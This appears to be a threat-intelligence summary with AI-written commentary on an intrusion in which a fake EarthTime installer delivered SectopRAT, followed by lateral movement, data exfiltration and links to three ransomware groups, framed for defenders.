Blurring the Lines: Intrusion Shows Connection With Three Major Ransomware Gangs

SUMMARY :

An intrusion began with a user downloading and executing a malicious file impersonating DeskSoft's EarthTime application, which deployed SectopRAT malware. The threat actor used multiple malware families, including SystemBC and Betruger, and various tools for reconnaissance and lateral movement. They moved across systems using RDP and Impacket's wmiexec, maintaining persistence through local account creation and startup folder shortcuts. Data was collected using WinRAR and exfiltrated via WinSCP to an FTP server. The discovery of tools linked to Play ransomware, DragonForce ransomware, and RansomHub suggests the threat actor was likely an affiliate operating across multiple ransomware groups.

OPENCTI LABELS :

sectoprat,ransomware,betruger,multi-group affiliation,data exfiltration,grixba,lateral movement,systembc


AI COMMENTARY :

1. In this detailed examination of the intrusion titled "Blurring the Lines: Intrusion Shows Connection With Three Major Ransomware Gangs" we unpack how a single malicious download evolved into a multifaceted campaign that leveraged a suite of stealthy tools and multiple ransomware affiliations. This inquiry sheds light on the evolving tactics of modern threat actors and underscores the importance of robust threat intelligence to anticipate and counter such incursions.

2. The intrusion began when an unsuspecting user executed a malicious file disguised as DeskSoft’s EarthTime application. Upon launch, SectopRAT malware was deployed, establishing a covert foothold. SectopRAT’s advanced command-and-control capabilities allowed the attacker to orchestrate further reconnaissance and prepare for lateral movement without triggering conventional defenses.

3. Beyond SectopRAT, the threat actor employed additional malware families, including SystemBC and Betruger, as well as the rarely observed Grixba backdoor. They exploited Remote Desktop Protocol (RDP) sessions and Impacket’s wmiexec tool to traverse the network. Persistence was maintained through the creation of local user accounts and the placement of malicious shortcuts within startup folders, ensuring that the actor could retain access even after system reboots.

4. Once positioned within the environment, the adversary collected and compressed sensitive data using WinRAR before transferring archives via WinSCP to a remote FTP server under their control. This streamlined exfiltration pipeline minimized the window for detection and maximized the volume of data siphoned from compromised systems.

5. A striking aspect of this campaign is the discovery of tools and infrastructure tied to Play ransomware, DragonForce ransomware, and RansomHub. The convergence of these disparate elements signals the presence of a highly adaptable affiliate who operates across multiple ransomware ecosystems. Rather than adhering to a single brand, this actor blurs the traditional boundaries between gangs to exploit new targets and evade attribution.

6. Defenders must adapt to the reality that ransomware affiliates can wield an eclectic arsenal of malware and switch allegiances rapidly. Effective defense hinges on proactive threat hunting for indicators such as SectopRAT DLLs, unusual RDP usage, and FTP exfiltration patterns. By integrating continuous monitoring with threat intelligence feeds that track emerging multi-group affiliations, security teams can disrupt these elusive operators before they achieve their objectives.


OPEN NETMANAGEIT OPENCTI REPORT LINK!


Use public read only username and password on login page.

NOTE : Use Public READ only user credentials on login page banner.


Blurring the Lines: Intrusion Shows Connection With Three Major Ransomware Gangs